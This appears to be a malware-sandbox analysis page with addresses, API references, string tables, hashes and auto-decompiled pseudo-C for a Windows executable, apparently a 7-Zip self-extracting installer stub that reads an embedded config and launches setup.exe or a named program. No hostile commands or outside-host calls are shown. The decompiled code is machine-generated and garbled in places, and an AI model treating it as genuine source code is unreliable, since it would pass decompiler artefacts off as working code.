0x0040c45e
0x0040c46a
0x0040c46f
0x0040c476
0x0040c47b
0x00000000
0x0040c47b
0x0040c165
0x00000000
0x0040c165
0x0040c145
0x0040c0e4
0x0040c0e7
0x0040c0ea
0x0040c419
0x0040c41b
0x0040c41f
0x0040c424
0x0040c424
0x00000000
0x0040c41f
0x0040c0fb
0x0040c0fd
0x0040c103
0x0040c105
0x0040c105
0x0040c10a
0x0040c10c
0x0040c429
0x0040c42c
0x0040c430
0x0040c432
0x0040c43b
0x0040c43b
0x00000000
0x0040c112
0x0040c112
0x0040c115
0x00000000
0x0040c115
0x0040c032
0x0040c032
0x0040c036
0x0040c07e
0x0040c07e
0x0040c08e
0x0040c092
0x0040c094
0x0040c097
0x0040c099
0x0040c0b9
0x0040c0b9
0x0040c0bb
0x0040c0bf
0x0040c0c4
0x0040c0c4
0x00000000
0x0040c0bf
0x0040c0a0
0x0040c0a8
0x0040c0ab
0x0040c0ad
0x0040c0b0
0x0040c3d9
0x0040c3dc
0x0040c3e0
0x0040c3e2
0x0040c3e7
0x0040c3e7
0x0040c3f0
0x0040c3f4
0x0040c400
0x0040c405
0x0040c40c
0x0040c411
0x00000000
0x0040c411
0x0040c0b6
0x00000000
0x0040c0b6
0x0040c038
0x0040c048
0x0040c04c
0x0040c04e
0x0040c051
0x0040c053
0x0040c070
0x0040c070
0x0040c072
0x0040c076
0x0040c07b
0x0040c07b
0x00000000
0x0040c076
0x0040c05a
0x0040c05f
0x0040c062
0x0040c064
0x0040c067
0x0040c399
0x0040c39c
0x0040c3a0
0x0040c3a2
0x0040c3a7
0x0040c3a7
0x0040c3b0
0x0040c3b4
0x0040c3c0
0x0040c3c5
0x0040c3cc
0x0040c3d1
0x00000000
0x0040c3d1
0x0040c06d
0x00000000
0x0040c06d
0x0040c309
0x0040c315
0x0040c321
0x0040c329
0x0040c32d
0x0040c332
0x0040c335
0x0040c33c
0x0040c340
0x0040c344
0x00000000
0x0040c003
0x0040bf1f
0x0040bf22
0x0040bf28
0x0040bf2c
0x0040bf30
0x0040bf33
0x0040bf3b
0x0040bf3f
0x0040bf41
0x0040bf46
0x0040bf48
0x00000000
0x00000000
0x0040bf4e
0x0040bf51
0x0040bf54
0x0040bf61
0x0040bf65
0x0040c22f
0x0040c232
0x0040c236
0x0040c23e
0x0040c242
0x0040c24d
0x0040c251
0x0040c25d
0x0040c262
0x0040c269
0x0040c26e
0x00000000
0x0040c26e
0x0040bf6b
0x0040bf6e
0x00000000
0x00000000
0x0040bf74
0x0040bf77
0x0040bf80
0x0040bf86
0x0040bf8a
0x0040bf92
0x0040bf96
0x0040bf9b
0x0040bfa1
0x0040bfa5
0x0040bfa8
0x00000000
0x00000000
0x0040bfae
0x00000000
0x0040bfae
0x0040bf56
0x0040bf59
0x0040c20d
0x0040c211
0x0040c216
0x0040c219
0x0040c221
0x0040c225
0x00000000
0x0040c225
0x00000000
0x0040bf5f
0x0040c205
0x0040c209
0x00000000
0x0040bf0c
0x0040bf0c
0x00000000
0x0040bf0c
0x0040bf0a
0x0040be83
0x0040be8c
0x0040be91
0x0040be93
0x00000000
0x00000000
0x00000000
0x0040be93
0x0040be4d
0x0040be50
0x0040be52
0x0040be55
0x0040be57
0x0040be69
0x0040be6b
0x0040be6b
0x0040be77
0x0040be77
0x0040be77
0x0040be77
0x00000000
0x0040be77
0x0040be6d
0x0040be6f
0x00000000
0x0040be71
0x0040be71
0x00000000
0x0040be71
0x0040be6f
0x0040be59
0x0040be5f
0x0040be5f
0x00000000
0x0040be5f
0x0040be5b
0x0040be5d
0x00000000
0x00000000
0x00000000
0x0040bde3
0x0040bde3
0x0040c7a4
0x0040c7a4
0x0040c7ab
0x0040c7b0
0x0040c7b2
0x0040c7b8
0x0040c7c0
0x0040c7c0

APIs

__EH_prolog.LIBCMT ref: 0040BD8A

Part of subcall function 0040F0A2: _CxxThrowException.MSVCRT(?,0041C760), ref: 0040F0EB

Strings

, xrefs: 0040BDD6

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionH_prologThrow
String ID:
API String ID: 461045715-3916222277
Opcode ID: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
Instruction ID: 9dd891245016f0e6c4d5ed255e412f020d35e1d655fa0f2a31f40bb369a830a0
Opcode Fuzzy Hash: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
Instruction Fuzzy Hash: 91827E31900259DFDB14DFA4C884BAEBBB0BF05314F2442AEE815BB2D2D778AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00404B47, Relevance: 1.5, APIs: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B47(void** __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t8;
				void** _t14;

				_t14 = __ecx;
				if(E00404B27(__ecx) == 0) {
					L2:
					return 0;
				}
				_t8 = FindFirstFileW(_a4,  &_v596); // executed
				 *_t14 = _t8;
				if(_t8 != 0xffffffff) {
					E00404B8C( &_v596, _a8, __eflags);
					return 1;
				}
				goto L2;
			}

0x00404b51
0x00404b5a
0x00404b73
0x00000000
0x00404b73
0x00404b66
0x00404b6f
0x00404b71
0x00404b80
0x00000000
0x00404b85
0x00000000

APIs

Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32

FindFirstFileW.KERNELBASE(?,?), ref: 00404B66

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
Instruction ID: 8d5b1ebed930f7aebe848b96ddff61a25dc6a55b7fd75e971453d958bc1fd6fb
Opcode Fuzzy Hash: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
Instruction Fuzzy Hash: D7E092B000010456CF20AF24CC45AEA37BCAF91328F1041BAA960772D0DB38F94ACB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00401014, Relevance: 49.6, APIs: 8, Strings: 20, Instructions: 609
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00401014(void* __eflags, intOrPtr _a4, signed int _a7) {
				signed int _v5;
				signed int _v16;
				WCHAR* _v20;
				signed int _v28;
				char _v32;
				WCHAR* _v44;
				signed int _v52;
				char _v56;
				signed int _v64;
				signed int _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v120;
				signed int _v128;
				char _v132;
				char _v144;
				signed int _v152;
				char _v156;
				char _v160;
				char _v172;
				char _v184;
				WCHAR* _v196;
				char _v200;
				char _v212;
				struct _STARTUPINFOW _v280;
				struct _PROCESS_INFORMATION _v296;
				void* __ebp;
				signed int _t244;
				signed int _t247;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t260;
				signed int _t264;
				signed int _t287;
				int _t288;
				void* _t289;
				void* _t291;
				void* _t321;
				int _t339;
				signed int _t379;
				signed int _t383;
				signed int _t384;
				int _t398;
				void* _t491;
				void* _t530;
				void* _t547;
				intOrPtr _t548;
				signed int _t549;
				char** _t550;

				 *0x41f158 = _a4;
				if(E00401951() != 0) {
					E004143E0();
					E0040368D( &_v184);
					E0040368D( &_v32);
					E0040368D( &_v132);
					E0040368D( &_v104);
					E004036B0( &_v44, GetCommandLineW());
					E00403204(E00403000( &_v44,  &_v184,  &_v32), _v44);
					E0040368D( &_v144);
					E004042C1( &_v144);
					E00403AFE( &_v32);
					E00403AB3( &_v32);
					_a7 = 0;
					_t244 = E00403270( &_v32, "-y");
					__eflags = _t244;
					if(_t244 != 0) {
						__eflags = _v32 + 4;
						_a7 = 1;
						E0040376E( &_v32, _v32 + 4);
						E00403AFE( &_v32);
						E00403AB3( &_v32);
					}
					E004033AD( &_v156);
					_push( &_v156);
					_push(";!@InstallEnd@!");
					_t247 = E004019F5(_v144, ";!@Install@!UTF-8!", __eflags); // executed
					__eflags = _t247;
					if(_t247 != 0) {
						E004036F3( &_v172, ".\\");
						E0040368D( &_v56);
						__eflags = _v152;
						_v160 = 1;
						if(_v152 == 0) {
							L23:
							_v120 = 0;
							E0040368D( &_v116);
							_push( *0x41b1b0);
							_t251 = E00404A40( &_v120, __eflags); // executed
							__eflags = _t251;
							if(_t251 != 0) {
								_push(0x18);
								_t252 = E004031DD();
								__eflags = _t252;
								if(_t252 == 0) {
									_t549 = 0;
									__eflags = 0;
								} else {
									_t549 = E00401987(_t252);
								}
								__eflags = _t549;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t549 + 4))(_t549);
								}
								_t253 = E0040930E(_t549, __eflags); // executed
								__eflags = _t253;
								if(__eflags == 0) {
									E00403740( &_v92, __eflags,  &_v116);
									_v5 = 0;
									E0040368D( &_v20);
									_push( &_v20);
									_push( &_v5);
									_push(_v160);
									_push( &_v92); // executed
									_t260 = E004024DB(_t549,  &_v144, __eflags); // executed
									__eflags = _t260;
									if(_t260 == 0) {
										E00403204(_t260, _v20);
										E0040368D( &_v212);
										_v200 = 1;
										E00404834( &_v212);
										_t264 = E00404826(_v92);
										__eflags = _t264;
										if(_t264 != 0) {
											__eflags = _v128;
											if(__eflags == 0) {
												__eflags = _v52;
												if(__eflags != 0) {
													L62:
													E00403740( &_v44, __eflags,  &_v92);
													E004055BC( &_v44);
													E004036B0( &_v20, L"%%T\\");
													E00403204(E00403204(E00403B7D( &_v56,  &_v20,  &_v44), _v20), _v44);
													E00403740( &_v68, __eflags,  &_v56);
													E004036B0( &_v44, "%%T");
													E00403204(E00403B7D( &_v56,  &_v44,  &_v92), _v44);
													__eflags = _v28;
													if(__eflags != 0) {
														E0040393C();
														E0040399C( &_v56, __eflags,  &_v32);
													}
													_v280.cb = 0x44;
													_v280.lpReserved = 0;
													_v280.lpDesktop.cbSize = 0;
													_v280.lpTitle = 0;
													_v280.dwFlags = 0;
													_v280.cbReserved2 = 0;
													_v280.lpReserved2 = 0;
													E00403204(E00403740( &_v196, __eflags, E00403632( &_v80,  &_v172,  &_v56)), _v80);
													_t287 = CreateProcessW(0, _v196, 0, 0, 0, 0, 0, 0,  &_v280,  &_v296);
													__eflags = _t287;
													if(_t287 != 0) {
														_t288 = CloseHandle(_v296.hThread);
														_t547 = _v296.hProcess;
														_t289 = E00403204(_t288, _v196);
														_push(_v68);
														L74:
														E00403204(_t289);
														__eflags = _t547;
														if(_t547 != 0) {
															WaitForSingleObject(_t547, 0xffffffff);
															CloseHandle(_t547);
														}
														_t291 = E004018CA( &_v212); // executed
														E00403204(_t291, _v92);
														__eflags = _t549;
														if(_t549 != 0) {
															 *((intOrPtr*)( *_t549 + 8))(_t549);
														}
														goto L78;
													} else {
														__eflags = _a7;
														if(__eflags == 0) {
															_t287 = E00401BAE( &_v68, __eflags);
														}
														E00403204(E00403204(_t287, _v196), _v68);
														L68:
														E00403204(E004018CA( &_v212), _v92);
														L69:
														__eflags = _t549;
														if(_t549 != 0) {
															 *((intOrPtr*)( *_t549 + 8))(_t549);
														}
														E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00404ACE( &_v120), _v116), _v56), _v172), _v156), _v144), _v104), _v132), _v32), _v184);
														goto L72;
													}
												}
												E0040376E( &_v56, L"setup.exe");
												__eflags = E00405155(_v56, __eflags);
												if(__eflags != 0) {
													goto L62;
												}
												__eflags = _a7;
												if(_a7 == 0) {
													E0040B77A(0, L"Can not find setup.exe");
												}
												goto L68;
											}
											E00403740( &_v44, __eflags,  &_v132);
											__eflags = _v28;
											_v280.lpDesktop.cbSize = 0x3c;
											_v280.lpTitle = 0x140;
											_v280.dwX = 0;
											_v280.dwY = 0;
											_v280.dwXSize = _v44;
											if(__eflags != 0) {
												E00403944( &_v104);
												E0040399C( &_v104, __eflags,  &_v32);
											}
											E00403740( &_v68, __eflags,  &_v104);
											asm("sbb eax, eax");
											_t548 = 1;
											_v280.dwXCountChars = 0;
											_v280.dwYCountChars = _t548;
											_v280.hStdError = 0;
											_v280.dwYSize =  ~_v64 & _v68;
											_t339 = ShellExecuteExW( &(_v280.lpDesktop)); // executed
											__eflags = _v280.dwFillAttribute - 0x20;
											if(_v280.dwFillAttribute > 0x20) {
												_t547 = _v280.hStdError;
												_t289 = E00403204(_t339, _v68);
												_push(_v44);
												goto L74;
											} else {
												__eflags = _a7;
												if(_a7 == 0) {
													__eflags = 0;
													_t339 = E0040B77A(0, L"Can not open file");
												}
												E00403204(E00403204(_t339, _v68), _v44);
												E00403204(E004018CA( &_v212), _v92);
												__eflags = _t549;
												if(_t549 != 0) {
													 *((intOrPtr*)( *_t549 + 8))(_t549);
												}
												E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00404ACE( &_v120), _v116), _v56), _v172), _v156), _v144), _v104), _v132), _v32), _v184);
												return _t548;
											}
										}
										E00403204(E004018CA( &_v212), _v92);
										goto L46;
									}
									__eflags = _a7;
									if(_a7 != 0) {
										L43:
										E00403204(E00403204(_t260, _v20), _v92);
										goto L69;
									}
									__eflags = _t260 - 1;
									if(_t260 == 1) {
										L38:
										_t491 = 8;
										E00405FAD(_t491,  &_v20);
										_t260 = 0x80004005;
										L39:
										__eflags = _t260 - 0x80004004;
										if(_t260 != 0x80004004) {
											__eflags = _v16;
											if(__eflags == 0) {
												E00403204(E004037D2( &_v20, E00404319( &_v80, _t260, __eflags)), _v80);
											}
											_t530 = 7;
											_t260 = E00403204(MessageBoxW(0, _v20,  *(E00405E4F( &_v80, _t530)), 0x10), _v80);
										}
										goto L43;
									}
									__eflags = _v5;
									if(_v5 == 0) {
										goto L39;
									}
									goto L38;
								} else {
									E0040B77A(0, L"Can not load codecs");
									L46:
									__eflags = _t549;
									if(_t549 != 0) {
										 *((intOrPtr*)( *_t549 + 8))(_t549);
									}
									L26:
									_push(1);
									_pop(0);
									L78:
									_t247 = E00403204(E00403204(E00403204(E00404ACE( &_v120), _v116), _v56), _v172);
									_t550 =  &(_t550[3]);
									L79:
									E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(_t247, _v156), _v144), _v104), _v132), _v32), _v184);
									L80:
									return 0;
								}
							}
							__eflags = _a7;
							if(_a7 == 0) {
								__eflags = 0;
								E0040B77A(0, L"Can not create temp folder archive");
							}
							goto L26;
						}
						E0040E83C( &_v20);
						_t379 = E00403C57( &_v156,  &_v20, __eflags); // executed
						__eflags = _t379;
						if(_t379 != 0) {
							E00403F77( &_v44,  &_v20, "Title");
							E00403F77( &_v68,  &_v20, "BeginPrompt");
							E00403F77( &_v196,  &_v20, "Progress");
							_t383 = E004032CE(_v196, "no");
							__eflags = _t383;
							if(_t383 != 0) {
								_v160 = 0;
							}
							_t384 = E00403F46( &_v20, "Directory");
							__eflags = _t384;
							if(_t384 >= 0) {
								__eflags =  *((intOrPtr*)(_v20 + _t384 * 4)) + 0xc;
								E004037D2( &_v172,  *((intOrPtr*)(_v20 + _t384 * 4)) + 0xc);
							}
							__eflags = _v64;
							if(_v64 == 0) {
								L22:
								E00403204(E004037D2( &_v56, E00403F77( &_v80,  &_v20, "RunProgram")), _v80);
								 *_t550 = "ExecuteFile";
								E00403204(E004037D2( &_v132, E00403F77( &_v80,  &_v20)), _v80);
								 *_t550 = "ExecuteParameters";
								E00403204(E00403204(E00403204(E00403204(E004037D2( &_v104, E00403F77( &_v80,  &_v20)), _v80), _v196), _v68), _v44);
								_t550 =  &(_t550[4]);
								E00401C64( &_v20);
								goto L23;
							} else {
								__eflags = _a7;
								if(_a7 != 0) {
									goto L22;
								}
								_t398 = MessageBoxW(0, _v68, _v44, 0x24);
								__eflags = _t398 - 6;
								if(_t398 == 6) {
									goto L22;
								}
								E00403204(E00403204(E00403204(_t398, _v196), _v68), _v44);
								_t550 =  &(_t550[3]);
								L21:
								E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00403204(E00401C64( &_v20), _v56), _v172), _v156), _v144), _v104), _v132), _v32), _v184);
								goto L80;
							}
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = 0;
							E0040B77A(0, L"Config failed");
						}
						_push(1);
						_pop(0);
						goto L21;
					}
					__eflags = _a7;
					if(_a7 == 0) {
						__eflags = 0;
						_t247 = E0040B77A(0, L"Can\'t load config info");
					}
					_push(1);
					_pop(0);
					goto L79;
				} else {
					E0040B77A(0, L"Unsupported Windows version");
					L72:
					_t321 = 1;
					return _t321;
				}
			}

0x00401023
0x0040102f
0x00401042
0x0040104d
0x00401055
0x0040105d
0x00401065
0x00401074
0x0040108e
0x0040109a
0x004010a5
0x004010ad
0x004010b5
0x004010c4
0x004010c7
0x004010cc
0x004010ce
0x004010d6
0x004010d9
0x004010de
0x004010e6
0x004010ee
0x004010ee
0x004010f9
0x0040110a
0x0040110b
0x00401115
0x0040111a
0x0040111c
0x00401142
0x0040114a
0x0040114f
0x0040115b
0x00401162
0x00401337
0x0040133a
0x0040133d
0x00401342
0x0040134b
0x00401350
0x00401352
0x0040136d
0x0040136f
0x00401374
0x00401377
0x00401384
0x00401384
0x00401379
0x00401380
0x00401380
0x00401386
0x00401388
0x0040138d
0x0040138d
0x00401392
0x00401397
0x00401399
0x004013b3
0x004013bb
0x004013be
0x004013cc
0x004013d0
0x004013d4
0x004013dc
0x004013dd
0x004013e2
0x004013e4
0x00401465
0x00401471
0x0040147c
0x00401483
0x0040148b
0x00401490
0x00401492
0x004014bb
0x004014be
0x0040161a
0x0040161d
0x00401652
0x00401659
0x00401661
0x0040166e
0x0040168e
0x0040169c
0x004016a9
0x004016c1
0x004016c6
0x004016ca
0x004016cf
0x004016db
0x004016db
0x004016ed
0x004016f7
0x004016fd
0x00401703
0x00401709
0x0040170f
0x00401716
0x00401730
0x00401751
0x00401757
0x00401759
0x0040180c
0x00401818
0x0040181e
0x00401823
0x00401826
0x00401826
0x0040182c
0x0040182f
0x00401834
0x0040183b
0x0040183b
0x00401847
0x0040184f
0x00401854
0x00401857
0x0040185c
0x0040185c
0x00000000
0x0040175f
0x0040175f
0x00401762
0x00401767
0x00401767
0x0040177a
0x00401781
0x0040178f
0x00401794
0x00401794
0x00401797
0x0040179c
0x0040179c
0x004017f6
0x00000000
0x004017fb
0x00401759
0x00401627
0x00401634
0x00401636
0x00000000
0x00000000
0x00401638
0x0040163b
0x00401648
0x00401648
0x00000000
0x0040163b
0x004014cb
0x004014d3
0x004014d6
0x004014e0
0x004014ea
0x004014f0
0x004014f6
0x004014fc
0x00401501
0x0040150d
0x0040150d
0x00401519
0x00401525
0x00401527
0x0040152b
0x00401531
0x00401537
0x0040153d
0x0040154a
0x00401550
0x00401557
0x00401607
0x0040160d
0x00401612
0x00000000
0x0040155d
0x0040155d
0x00401560
0x00401567
0x00401569
0x00401569
0x00401579
0x0040158e
0x00401593
0x00401596
0x0040159b
0x0040159b
0x004015f5
0x00000000
0x004015fd
0x00401557
0x004014a2
0x00000000
0x004014a7
0x004013e6
0x004013e9
0x0040144c
0x00401457
0x00000000
0x0040145c
0x004013eb
0x004013ee
0x004013f5
0x004013fa
0x004013fb
0x00401400
0x00401405
0x00401405
0x0040140a
0x0040140c
0x0040140f
0x00401427
0x0040142c
0x00401432
0x00401446
0x0040144b
0x00000000
0x0040140a
0x004013f0
0x004013f3
0x00000000
0x00000000
0x00000000
0x0040139b
0x004013a2
0x004014a8
0x004014a8
0x004014aa
0x004014b3
0x004014b3
0x00401365
0x00401365
0x00401367
0x0040185f
0x0040187d
0x00401882
0x00401885
0x004018b9
0x004018c1
0x00000000
0x004018c1
0x00401399
0x00401354
0x00401357
0x0040135e
0x00401360
0x00401360
0x00000000
0x00401357
0x0040116b
0x00401179
0x0040117e
0x00401180
0x004011a6
0x004011b6
0x004011c9
0x004011d9
0x004011de
0x004011e0
0x004011e2
0x004011e2
0x004011f0
0x004011f5
0x004011f7
0x00401205
0x00401209
0x00401209
0x0040120e
0x00401211
0x004012aa
0x004012c6
0x004012d1
0x004012e9
0x004012f4
0x00401327
0x0040132c
0x00401332
0x00000000
0x00401217
0x00401217
0x0040121a
0x00000000
0x00000000
0x00401229
0x0040122b
0x0040122e
0x00000000
0x00000000
0x00401246
0x0040124b
0x0040124e
0x0040129d
0x00000000
0x004012a2
0x00401211
0x00401182
0x00401185
0x0040118c
0x0040118e
0x0040118e
0x00401193
0x00401195
0x00000000
0x00401195
0x0040111e
0x00401121
0x00401128
0x0040112a
0x0040112a
0x0040112f
0x00401131
0x00000000
0x00401031
0x00401038
0x004017fe
0x00401800
0x00000000
0x00401800

APIs

Part of subcall function 00401951: GetVersionExW.KERNEL32(?), ref: 0040196B

GetCommandLineW.KERNEL32(?,?,00000000), ref: 0040106A

Part of subcall function 0040B77A: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0040B783

Strings

Progress, xrefs: 004011BB
BeginPrompt, xrefs: 004011AB
D, xrefs: 004016ED
Can not find setup.exe, xrefs: 00401641
Directory, xrefs: 004011E8
;!@InstallEnd@!, xrefs: 0040110B
Can not create temp folder archive, xrefs: 00401359
Config failed, xrefs: 00401187
, xrefs: 00401550
%%T, xrefs: 004016A1
RunProgram, xrefs: 004012AA
<, xrefs: 004014D6
Title, xrefs: 0040119B
%%T\, xrefs: 00401666
Unsupported Windows version, xrefs: 00401031
Can not load codecs, xrefs: 0040139B
setup.exe, xrefs: 0040161F
;!@Install@!UTF-8!, xrefs: 00401110
Can't load config info, xrefs: 00401123
Can not open file, xrefs: 00401562

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CommandLineMessageVersion
String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$BeginPrompt$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$Progress$RunProgram$Title$Unsupported Windows version$setup.exe
API String ID: 1181637900-2745836148
Opcode ID: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
Instruction ID: 78f7f2e9f043a6e6e6b7956f289dc4eafbfd083bebb4df73e2f95e0f672d6238
Opcode Fuzzy Hash: a0069bc1b76d23120d7a9335fb8639b802b751fe182a55a2f7d8ebf9f1ac61d4
Instruction Fuzzy Hash: 6F320971800119AACF15BFA2CC52AEDBF39AF04319F1084BFE515761E2DB395A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041910C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x41c298);
				_push(0x419106);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x4213e4 =  *0x4213e4 | 0xffffffff;
				 *0x4213e8 =  *0x4213e8 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x41f3c8; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x41f3c4; // 0x0
				 *_t24 = _t47;
				 *0x4213ec = _adjust_fdiv;
				_t27 = E00419297( *_adjust_fdiv);
				_t61 =  *0x41f150; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00419294);
				}
				E00419282(_t27);
				_push(0x41f038);
				_push(0x41f034);
				L0041927C();
				_t29 =  *0x41f3c0; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41f3bc,  &_v112);
				_push(0x41f030);
				_push(0x41f000);
				L0041927C();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00401014(_t69, GetModuleHandleA(0), 0, _t55, _t38); // executed
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00419276();
				return _t41;
			}

0x0041910f
0x00419111
0x00419116
0x00419121
0x00419122
0x0041912f
0x00419134
0x00419139
0x00419140
0x00419147
0x0041914e
0x00419154
0x0041915a
0x0041915c
0x00419162
0x00419168
0x00419171
0x00419176
0x0041917b
0x00419181
0x00419188
0x0041918e
0x0041918f
0x00419194
0x00419199
0x0041919e
0x004191a3
0x004191a8
0x004191c1
0x004191c7
0x004191cc
0x004191d1
0x004191de
0x004191e0
0x004191e6
0x00419222
0x00419222
0x00419225
0x00000000
0x00000000
0x00419227
0x00419228
0x00419228
0x004191e8
0x004191e8
0x004191e8
0x004191e9
0x004191ec
0x004191ee
0x004191f9
0x004191fb
0x004191fb
0x004191fc
0x004191fc
0x004191f9
0x004191ff
0x004191ff
0x00419203
0x00000000
0x00000000
0x00419209
0x00419210
0x00419216
0x0041921a
0x0041922f
0x0041921c
0x0041921c
0x0041921c
0x0041923b
0x00419240
0x00419244
0x0041924a
0x0041924f
0x00419251
0x00419254
0x00419255
0x00419256
0x0041925d

APIs

__set_app_type.MSVCRT ref: 00419139
__p__fmode.MSVCRT ref: 0041914E
__p__commode.MSVCRT ref: 0041915C
__setusermatherr.MSVCRT ref: 00419188
_initterm.MSVCRT ref: 0041919E
__getmainargs.MSVCRT ref: 004191C1
_initterm.MSVCRT ref: 004191D1
GetStartupInfoA.KERNEL32(?), ref: 00419210
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00419234
exit.KERNELBASE ref: 00419244
_XcptFilter.MSVCRT ref: 00419256

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
Instruction ID: 00b1766c458623f5937beb69801fb3c22a2eab9a989783d6d676752ba79aceb1
Opcode Fuzzy Hash: 953566137ff324d2cc08c920b6bee47bf00e17c29684309f18a3ad35c9c7aab9
Instruction Fuzzy Hash: 7041AD71940358BFDB24CFA4DC99AEA7BB8EB09710F20456FE852933A1D7384C81CB58

Uniqueness

Uniqueness Score: -1.00%

